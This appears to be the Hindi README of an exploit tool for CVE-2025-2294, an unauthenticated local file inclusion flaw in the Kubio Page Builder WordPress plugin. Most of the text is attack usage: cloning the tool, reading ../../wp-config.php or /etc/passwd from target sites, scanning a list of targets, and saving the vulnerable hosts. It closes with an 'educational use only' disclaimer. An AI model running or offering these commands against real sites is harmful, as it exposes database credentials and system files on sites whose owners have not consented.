
Kubio Page Builder WordPress प्लगइन (संस्करण ≤ 2.5.1) के लिए Local File Inclusion (LFI) एक्सप्लॉइट।
यह टूल Kubio Page Builder प्लगइन (CVE-2025-2294) में एक बिना प्रमाणीकरण वाली LFI कमज़ोरी का फायदा उठाता है, जिससे हमलावर कमज़ोर WordPress इंस्टॉलेशन पर संवेदनशील फ़ाइलें पढ़ सकते हैं।
-u)-l)-o)git clone https://github.com/mrrivaldo/CVE-2025-2294.git
python3 cve-2025-2294.py -u https://vulnerable-site.com
python3 cve-2025-2294.py -u https://vulnerable-site.com -f ../../wp-config.php
python3 cve-2025-2294.py -l targets.txt -o results.txt
python3 cve-2025-2294.py --help
targets.txt:
https://wordpress-site1.com
http://wordpress-site2.com
https://another-vulnerable-site.com
यह टूल केवल शैक्षिक उद्देश्यों के लिए है। डेवलपर किसी भी दुरुपयोग के लिए ज़िम्मेदार नहीं है। किसी भी सिस्टम का परीक्षण करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें।
| विकल्प | विवरण |
|---|
-u, --url | एकल टार्गेट URL |
-l, --list | टार्गेट की सूची वाली फ़ाइल |
-f, --file | पढ़ने के लिए फ़ाइल (डिफ़ॉल्ट: /etc/passwd) |
-o, --output | कमज़ोर टार्गेट को फ़ाइल में सहेजें |